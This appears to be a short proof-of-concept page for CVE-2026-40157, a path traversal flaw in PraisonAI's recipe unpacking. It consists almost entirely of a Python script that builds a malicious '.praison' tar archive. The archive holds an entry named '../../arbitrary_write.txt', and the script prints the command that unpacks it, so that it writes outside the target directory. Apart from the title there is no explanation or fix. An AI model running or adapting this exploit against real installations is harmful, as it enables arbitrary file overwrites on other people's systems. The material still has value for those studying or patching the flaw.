CVE-2026-40157: PraisonAI路径遍历漏洞

import tarfile import os def create_malicious_tar(): """ Creates a malicious .praison tar archive demonstrating the path traversal. """ output_filename = "malicious_exploit.praison" # The file name includes path traversal sequences to escape the directory malicious_file_name = "../../arbitrary_write.txt" try: with tarfile.open(output_filename, "w") as tar: # Create a TarInfo object for the malicious file info = tarfile.TarInfo(name=malicious_file_name) info.size = 0 # Add the file to the archive tar.addfile(info) print(f"[+] Successfully created malicious archive: {output_filename}") print(f"[+] Archive contains path traversal: {malicious_file_name}") print(f"[+] Usage: praisonai recipe unpack {output_filename}") except Exception as e: print(f"[-] Error creating tar file: {e}") if __name__ == "__main__": create_malicious_tar()